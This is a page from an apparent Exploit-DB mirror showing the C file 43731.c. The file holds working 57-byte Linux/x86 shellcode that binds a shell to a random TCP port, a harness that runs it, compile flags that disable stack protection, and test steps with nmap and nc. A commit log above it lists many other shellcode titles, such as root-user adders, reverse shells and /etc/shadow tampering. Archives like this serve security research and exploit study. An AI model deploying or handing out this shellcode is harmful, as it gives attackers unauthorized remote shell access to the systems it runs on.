bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86/43731.c
Offensive Security 1db36d5e8b DB: 2018-01-18 
76 changes to exploits/shellcodes

Printoxx - Local Buffer Overflow (PoC)
Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)
Printoxx - Local Buffer Overflow (PoC)
Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)
Microsoft Edge Chakra JIT - Incorrect Bounds Calculation
Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion
Microsoft Edge Chakra - Incorrect Scope Handling
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
Microsoft Edge Chakra JIT - Out-of-Bounds Write
Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read
Microsoft Edge Chakra JIT - Stack-to-Heap Copy
Transmission - RPC DNS Rebinding
Master IP CAM 01 - Multiple Vulnerabilities
Zomato Clone Script - Arbitrary File Upload
Reservo Image Hosting Script 1.5 - Cross-Site Scripting
D-Link DSL-2640R - Unauthenticated DNS Change
Belkin N600DB Wireless Router - Multiple Vulnerabilities
SugarCRM 3.5.1 - Cross-Site Scripting

Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)
Linux/x86 - HTTP Server (8800/TCP) + fork() Shellcode (166 bytes)

Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)
Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)

Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)
Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes)

Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (36 bytes)

Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes)

Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)
Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)

Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes)
Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes)

Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)

Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)

Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes)
Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)

Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes)
Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)

Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)
Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)

Linux/x86 - Add Root User (z) Shellcode (70 bytes)
Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)

Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)

Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)

Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)
Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)
Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)
Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)
Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)
Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)

Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)
Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)

Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)

Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)
Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)

Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)
Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)

FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)
Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)
Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)
Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)
Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)

Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)
Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode

Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)
Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)

Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes)
Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)

Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)
Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)

Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)
Linux/x86 - execve(/bin/sh /tmp/p00p) Shellcode (70 bytes)
Linux/x86 - execve(/bin/ash) + exit() Shellcode (34 bytes)
Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)
Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes)
Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes)
Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)
Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)
Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)
Linux/x86 - setuid(0) + chmod(/etc/shadow_ 0666) Shellcode (37 bytes)
Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes)
Linux/x86 - Remote File Download Shellcode (42 bytes)
Linux/x86 - CDRom Ejecting Shellcode (46 bytes)
Linux/x86 - sethostname(PwNeD !!_ 8) Shellcode (32 bytes)
Linux/x86 - exit(0) Shellcode (8 bytes)
Linux/x86 - sync Shellcode (6 bytes)
Linux/x86 - execve(/bin/sh_ -c_ ping localhost)  Shellcode (55 bytes)
Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)
Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
Linux/x86 - Force unmount /media/disk Shellcode (33 bytes)
Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes)
Linux/x86 - CDRom Ejecting + Polymorphic Shellcode (74 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)
Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)
Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)
Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)
Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes)
Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes)
Linux/x86 - setreuid() + /sbin/iptables -F + exit(0) Shellcode (76 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (28 bytes)
Linux/x86 - mkdir(hacked) + exit() Shellcode (36 bytes)
Linux/x86 - Stager Reads Second Stage From STDIN Shellcode (14 bytes)
Linux/x86 - iptables --flush Shellcode (43 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)
Linux/x86 - Force Reboot Shellcode (36 bytes)
Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86 - Egghunter Shellcode (38 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)

Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)
2018-01-18 05:02:25 +00:00

88 lines
No EOL
2.2 KiB
C
Raw Blame History

/*
Tiny Shell Bind TCP Random Port Shellcode - C Language
Linux/x86
Written in 2013 by Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This source is licensed under the Creative Commons
Attribution-ShareAlike 3.0 Brazil License.
To view a copy of this license, visit
http://creativecommons.org/licenses/by-sa/3.0/
You are free:
to Share - to copy, distribute and transmit the work
to Remix - to adapt the work
to make commercial use of the work
Under the following conditions:
Attribution - You must attribute the work in the manner
specified by the author or licensor (but
not in any way that suggests that they
endorse you or your use of the work).
Share Alike - If you alter, transform, or build upon
this work, you may distribute the
resulting work only under the same or
similar license to this one.
*/
/*
tiny_shell_bind_tcp_random_port_shellcode
* 57 bytes
* null-free
# gcc -m32 -fno-stack-protector -z execstack tiny_shell_bind_tcp_random_port_shellcode.c -o tiny_shell_bind_tcp_random_port_shellcode
Testing
# ./tiny_shell_bind_tcp_random_port_shellcode
# netstat -anp | grep shell
# nmap -sS 127.0.0.1 -p- (It's necessary to use the TCP SYN scan option [-sS]; thus avoids that nmap connects to th$
# nc 127.0.0.1 port
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
"\x02\x89\xe1\xcd\x80\x52\x50\x89\xe1\xb0"
"\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd\x80"
"\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8"
"\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x41\xcd\x80";
main ()
{
// When the Port contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(code));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call code");
}
Reference in a new issue View git blame Copy permalink